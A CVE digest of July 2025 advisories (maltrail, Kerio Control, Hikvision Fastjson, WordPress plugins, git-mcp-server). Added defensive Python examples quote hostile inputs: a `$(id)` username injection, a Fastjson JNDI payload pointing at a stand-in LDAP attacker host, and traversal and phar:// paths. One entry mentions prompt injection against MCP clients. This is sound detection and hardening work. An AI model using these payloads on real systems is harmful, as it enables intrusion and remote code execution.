
CVE-2025-34073 – stamparm/maltrail <=0.54 Remote Command Execution
https://notcve.org/view.php?id=CVE-2025-34073
02 Jul 2025 — A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint. • https://vulncheck.com/advisories/stamparm-maltrail-rce • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CWE-306: Missing Authentication for Critical Function
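The bug class in the entry above, as an added example that is not maltrail's code: a login handler that interpolates the POSTed username into a command line later handed to a shell, beside the argv form that closes the hole, plus a detector for the usernames such an attack needs. The `logger` invocation, the parameter names and the request body are assumptions made for the demo; nothing here runs a shell, the command strings are returned so the break-out is visible.

```python
"""Illustration of OS command injection through an unauthenticated /login
username (the pattern of CVE-2025-34073).  Added example, not maltrail's code:
the logger command line, parameter names and request bodies are assumed."""
import shlex
import subprocess
from urllib.parse import parse_qs

# Characters that change the meaning of a command line once a shell parses it,
# plus the quotes that terminate the quoted context the username is placed in.
SHELL_META = set(";|&`$(){}<>\n'\"\\")


def username_from_login_body(body: str) -> str:
    """Pull `username` out of an application/x-www-form-urlencoded POST body the
    way a web handler would (percent-decoded)."""
    return parse_qs(body, keep_blank_values=True).get("username", [""])[0]


def build_cmd_vulnerable(username: str, client_ip: str) -> str:
    """The injection point: the raw username is interpolated into a string that
    the handler would pass to subprocess with shell=True.  Inside the double
    quotes a `$(...)` runs as command substitution, and a `"` followed by `;`
    ends the logger argument and starts a new command."""
    return ('logger -p auth.info -t httpd '
            '"Failed login attempt for user \'%s\' from IP \'%s\'"' % (username, client_ip))


def build_cmd_safe(username: str, client_ip: str) -> list:
    """Hardened form: one argv element per token and no shell involved, so
    whatever the username contains stays inert bytes of a single argument."""
    msg = "Failed login attempt for user '%s' from IP '%s'" % (username, client_ip)
    return ["logger", "-p", "auth.info", "-t", "httpd", msg]


def log_failed_login(username: str, client_ip: str) -> int:
    """Run the hardened command and return logger's exit status.  Not called at
    import time because `logger` may be absent on the machine running this."""
    return subprocess.run(build_cmd_safe(username, client_ip), check=False).returncode


def is_injection_attempt(username: str) -> bool:
    """Detection side: flag login usernames carrying shell metacharacters or
    quotes, which have no place in a username and are what the attack needs."""
    return any(ch in SHELL_META for ch in username)


if __name__ == "__main__":
    body = "username=%24%28id%29&password=x"   # constructed request body: username = $(id)
    user = username_from_login_body(body)
    print("vulnerable:", build_cmd_vulnerable(user, "198.51.100.7"))
    print("safe argv :", shlex.join(build_cmd_safe(user, "198.51.100.7")))
    print("flagged   :", is_injection_attempt(user))
```

The detector will also flag legitimate usernames containing an apostrophe; on a service where those exist, narrow `SHELL_META` to the characters the handler's own quoting context makes dangerous rather than dropping the check.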

CVE-2025-34071 – GFI Kerio Control Unsigned System Image Upload Root Code Execution
https://notcve.org/view.php?id=CVE-2025-34071
02 Jul 2025 — A remote code execution vulnerability in GFI Kerio Control 9.4.5 allows attackers with administrative access to upload and execute arbitrary code through the firmware upgrade feature. • https://ssd-disclosure.com/ssd-advisory-kerio-control-authentication-bypass-and-rce • CWE-306: Missing Authentication for Critical Function

CVE-2025-34070 – GFI Kerio Control GFIAgent Missing Authentication on Administrative Interfaces
https://notcve.org/view.php?id=CVE-2025-34070
02 Jul 2025 — A missing authentication vulnerability in the GFIAgent component of GFI Kerio Control 9.4.5 allows unauthenticated remote attackers to perform privileged operations. The GFIAgent service, responsible for integration with GFI AppManager, exposes HTTP services on ports 7995 and 7996 without proper authentication. The /proxy handler on port 7996 allows arbitrary forwarding to administrative endpoints when provided with an Appliance UUID, which itself can be retrieved from port 7995. This results in a complete ... • https://ssd-disclosure.com/ssd-advisory-kerio-control-authentication-bypass-and-rce • CWE-306: Missing Authentication for Critical Function

CVE-2025-34069 – GFI Kerio Control GFIAgent Authentication Bypass via Proxy Forwarding
https://notcve.org/view.php?id=CVE-2025-34069
02 Jul 2025 — An authentication bypass vulnerability exists in GFI Kerio Control 9.4.5 due to insecure default proxy configuration and weak access control in the GFIAgent service. The non-transparent proxy on TCP port 3128 can be used to forward unauthenticated requests to internal services such as GFIAgent, bypassing firewall restrictions and exposing internal management endpoints. This enables unauthenticated attackers to access the GFIAgent service on ports 7995 and 7996, retrieve the appliance UUID, and issue adminis... • https://ssd-disclosure.com/ssd-advisory-kerio-control-authentication-bypass-and-rce • CWE-306: Missing Authentication for Critical Function
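Hunting for the chain described in the two GFIAgent entries above (CVE-2025-34070 and CVE-2025-34069) in proxy access logs: a client riding the non-transparent proxy on TCP 3128 to the appliance's own GFIAgent services on ports 7995 and 7996, with the port-7995 UUID retrieval and the port-7996 /proxy handler labelled separately. This is an added example, not GFI's code or log format: the "client method url status" line layout is constructed, the sample lines are made up, and the appliance address set is an assumption to be replaced with the real one.

```python
"""Flag proxy requests that reach the appliance's GFIAgent ports (7995/7996).
Added example, not a Kerio Control log format: the layout and lines below are
constructed for the demo and APPLIANCE_HOSTS is an assumed address set."""
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

GFIAGENT_PORTS = {7995, 7996}
APPLIANCE_HOSTS = {"127.0.0.1", "localhost", "::1", "10.0.0.1"}   # assumed appliance addresses
LOG_RE = re.compile(r"^(?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")

# Constructed sample of access-log lines from the port-3128 proxy; the first and
# last are benign (an ordinary site, and an external host that merely uses port 7995).
SAMPLE_LOG = """\
192.0.2.5 GET http://example.com/index.html 200
203.0.113.7 GET http://127.0.0.1:7995/ 200
203.0.113.7 GET http://127.0.0.1:7996/proxy 200
203.0.113.7 CONNECT 127.0.0.1:7996 200
192.0.2.5 GET https://example.org:7995/ 200
"""


def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def target_of(method: str, url: str) -> Tuple[str, int, str]:
    """(host, port, path) of the request target.  CONNECT carries a bare
    host:port, so it is prefixed with '//' to parse as an authority."""
    parts = urlsplit(url if "://" in url else "//" + url)
    port = parts.port or (443 if parts.scheme == "https" or method == "CONNECT" else 80)
    return (parts.hostname or "", port, parts.path)


def classify(entry: dict) -> Optional[str]:
    """Label a parsed entry, or None when it does not touch GFIAgent on the appliance."""
    host, port, path = target_of(entry["method"], entry["url"])
    if host not in APPLIANCE_HOSTS or port not in GFIAGENT_PORTS:
        return None
    if port == 7996 and path.startswith("/proxy"):
        return "gfiagent-proxy-forward"   # /proxy handler: forwarding to admin endpoints
    if port == 7995:
        return "gfiagent-uuid-probe"      # the port the appliance UUID is retrievable from
    return "gfiagent-access"              # anything else on 7996, e.g. a CONNECT tunnel


def hunt(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client, label, url) for every flagged line, in log order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        label = classify(entry)
        if label:
            findings.append((entry["client"], label, entry["url"]))
    return findings


if __name__ == "__main__":
    for client, label, url in hunt(SAMPLE_LOG):
        print(client, label, url)
```

A single source address showing `gfiagent-uuid-probe` followed by `gfiagent-proxy-forward` is the order the advisory text describes; one hit on either label from outside the management network already deserves a look, since nothing legitimate should reach those ports through the forward proxy.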

CVE-2025-34067 – Hikvision HikCentral (formerly "Integrated Security Management Platform") Remote Command Execution via applyCT Fastjson
https://notcve.org/view.php?id=CVE-2025-34067
02 Jul 2025 — By referencing a malicious class via an LDAP URL, an attacker can achieve remote code execution on the underlying system. • https://s4e.io/tools/hikvision-applyct-remote-code-execution • CWE-502: Deserialization of Untrusted Data CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
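What the Fastjson trigger in the entry above looks like on the wire, and how to spot it in a request body: an `@type` autotype key naming a class that performs a JNDI lookup when one of its properties is set, together with the `ldap://` (or `rmi://`) reference the JVM then resolves and loads a class from. This is an added example, not Hikvision's code: the payloads are constructed, the gadget list is the generally known `JdbcRowSetImpl` family rather than anything taken from the advisory, and the inspection runs after JSON parsing so that `\u0040type` style escapes collapse to `@type` before matching.

```python
"""Inspect a request body for a Fastjson-style @type / JNDI deserialization
trigger (the class behind CVE-2025-34067).  Added example, not Hikvision's code;
sample payloads are constructed and the gadget list is the well-known one."""
import json
from typing import List, Tuple

JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://", "iiop://")
# Classes that do a JNDI lookup when a property is set (dataSourceName etc.).
KNOWN_JNDI_GADGETS = {
    "com.sun.rowset.JdbcRowSetImpl",
    "org.apache.xbean.propertyeditor.JndiConverter",
}

# Constructed payloads; 203.0.113.9 is a documentation address standing in for
# an attacker-controlled LDAP server.
MALICIOUS = ('{"x":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
             '"dataSourceName":"ldap://203.0.113.9:1389/Exploit","autoCommit":true}}')
EVASIVE = '{"\\u0040type":"Lcom.sun.rowset.JdbcRowSetImpl;"}'
BENIGN = '{"name":"probe","count":1,"url":"https://example.com/"}'


def normalize_class(name: str) -> str:
    """Fastjson also accepts JVM-descriptor spellings such as `Lcom.Foo;` (and
    nested `LLcom.Foo;;`) for the @type value; strip them so comparisons hold."""
    while name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name


def _walk(node, findings: List[Tuple[str, str]]) -> None:
    """Collect ('autotype', class) and ('jndi-url', url) pairs from a parsed body."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "@type" and isinstance(value, str):
                findings.append(("autotype", normalize_class(value)))
            elif isinstance(value, str) and value.lower().startswith(JNDI_SCHEMES):
                findings.append(("jndi-url", value))
            else:
                _walk(value, findings)
    elif isinstance(node, list):
        for item in node:
            _walk(item, findings)


def scan_body(body: str) -> List[Tuple[str, str]]:
    """Parse first, then inspect: json.loads already turns `\\u0040type` into
    `@type`, so escape-based evasions of a plain substring match collapse here."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []          # not JSON; a lenient parser on the server may still accept it
    findings: List[Tuple[str, str]] = []
    _walk(doc, findings)
    return findings


def is_jndi_deser_attempt(body: str) -> bool:
    """True when a known JNDI gadget is named, or any autotype is paired with a
    JNDI URL somewhere in the document."""
    f = scan_body(body)
    classes = {v for k, v in f if k == "autotype"}
    has_url = any(k == "jndi-url" for k, _ in f)
    return bool(classes & KNOWN_JNDI_GADGETS) or (bool(classes) and has_url)


if __name__ == "__main__":
    for name, body in (("malicious", MALICIOUS), ("evasive", EVASIVE), ("benign", BENIGN)):
        print(name, is_jndi_deser_attempt(body), scan_body(body))
```

The `@type` key alone is the useful signal in most deployments: a client has no reason to steer the server's choice of class, so alerting on any autotype key in a body bound for this kind of endpoint is cheaper and more robust than maintaining the gadget list.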

CVE-2025-2932 – JKDEVKIT <= 1.9.4 - Authenticated (Subscriber+) Arbitrary File Deletion
https://notcve.org/view.php?id=CVE-2025-2932
02 Jul 2025 — This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). • https://www.wordfence.com/threat-intel/vulnerabilities/id/68679ff9-48a8-4146-a37f-5f844dc86c92?source=cve • CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

CVE-2025-47812 – Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
https://notcve.org/view.php?id=CVE-2025-47812
https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812

CVE-2025-4946 – Vikinger <= 1.9.32 - Authenticated (Subscriber+) Arbitrary File Deletion via vikinger_delete_activity_media_ajax Function
https://notcve.org/view.php?id=CVE-2025-4946
01 Jul 2025 — This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). • https://themeforest.net/item/vikinger-buddypress-and-gamipress-social-community/28612259 • CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

CVE-2025-53107 – @cyanheads/git-mcp-server vulnerable to command injection in several tools
https://notcve.org/view.php?id=CVE-2025-53107
01 Jul 2025 — Successful exploitation can lead to remote code execution under the server process's privileges. ... An MCP Client can be instructed to execute additional actions for example via indirect prompt injection when asked to read git logs. • https://github.com/cyanheads/git-mcp-server/commit/0dbd6995ccdf76ab770b58013034365b2d06c4d9 • CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')

CVE-2025-6464 – Forminator Forms – Contact Form, Payment Form & Custom Form Builder <= 1.44.2 - Unauthenticated PHP Object Injection (PHAR) Triggered via Administrator Form Submission Deletion
https://notcve.org/view.php?id=CVE-2025-6464
01 Jul 2025 — If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. • https://plugins.trac.wordpress.org/browser/forminator/trunk/library/model/class-form-entry-model.php#L1249 • CWE-502: Deserialization of Untrusted Data
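The check that the three WordPress entries above lack before their file operation, as one added example that serves all of them: the JKDEVKIT (CVE-2025-2932) and Vikinger (CVE-2025-4946) deletions need the target confined to the uploads directory so `../../wp-config.php` is refused, and the Forminator case (CVE-2025-6464) needs stream-wrapper paths such as `phar://` refused before any filesystem call, since in PHP even `file_exists()` on a `phar://` path deserializes the archive's metadata. This is an added example written in Python, not the plugins' PHP; the uploads directory is an assumption, the capability check for the calling user (the other half of these bugs) is out of scope, and nothing is actually deleted unless `dry_run` is turned off.

```python
"""Confine a delete-file operation to an uploads directory, rejecting stream
wrappers, NUL bytes, absolute paths and traversal.  Added example in Python,
not the plugins' PHP; UPLOADS is an assumed path and nothing is deleted by default."""
import os
import re
from typing import Optional

UPLOADS = "/var/www/html/wp-content/uploads"            # assumed uploads directory
UPLOADS_REAL = os.path.realpath(UPLOADS)
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*://")   # phar://, php://, file://, ...


def rejection_reason(base: str, user_path: str) -> Optional[str]:
    """None if `user_path` may be deleted under `base`, otherwise a short reason.
    Order matters: the NUL and wrapper checks run before any path function is
    touched, because a wrapper scheme must never reach the filesystem layer."""
    if "\x00" in user_path:
        return "nul-byte"                 # truncation trick against C-level path handling
    if SCHEME_RE.match(user_path):
        return "stream-wrapper"           # phar:// here is the CVE-2025-6464 trigger
    if os.path.isabs(user_path):
        return "absolute-path"            # os.path.join would discard `base` entirely
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, user_path))
    if target == base_real:
        return "base-dir-itself"
    if os.path.commonpath([base_real, target]) != base_real:
        return "outside-base"             # ../ traversal resolved to a parent directory
    return None


def is_allowed(base: str, user_path: str) -> bool:
    return rejection_reason(base, user_path) is None


def resolve_delete_target(base: str, user_path: str) -> str:
    """Canonical absolute path to delete, or ValueError with the rejection reason."""
    reason = rejection_reason(base, user_path)
    if reason:
        raise ValueError("refusing to delete %r: %s" % (user_path, reason))
    return os.path.realpath(os.path.join(os.path.realpath(base), user_path))


def delete_upload(base: str, user_path: str, dry_run: bool = True) -> str:
    """Validate, then unlink the canonical path (only when dry_run is False)."""
    target = resolve_delete_target(base, user_path)
    if not dry_run:
        os.unlink(target)
    return target


if __name__ == "__main__":
    # Constructed inputs: one legitimate attachment and the shapes the advisories describe.
    for candidate in ("2025/07/a.png", "../../../wp-config.php", "/etc/passwd",
                      "phar://2025/07/evil.jpg/x", "2025/07/a.png\x00.php", ""):
        print(repr(candidate), "->", rejection_reason(UPLOADS, candidate) or "allowed")
```

`realpath` is applied to both sides so a symlinked uploads directory compares equal to itself; the containment test is then a `commonpath` comparison rather than a string prefix check, which would let `uploads-old/` pass as a child of `uploads/`.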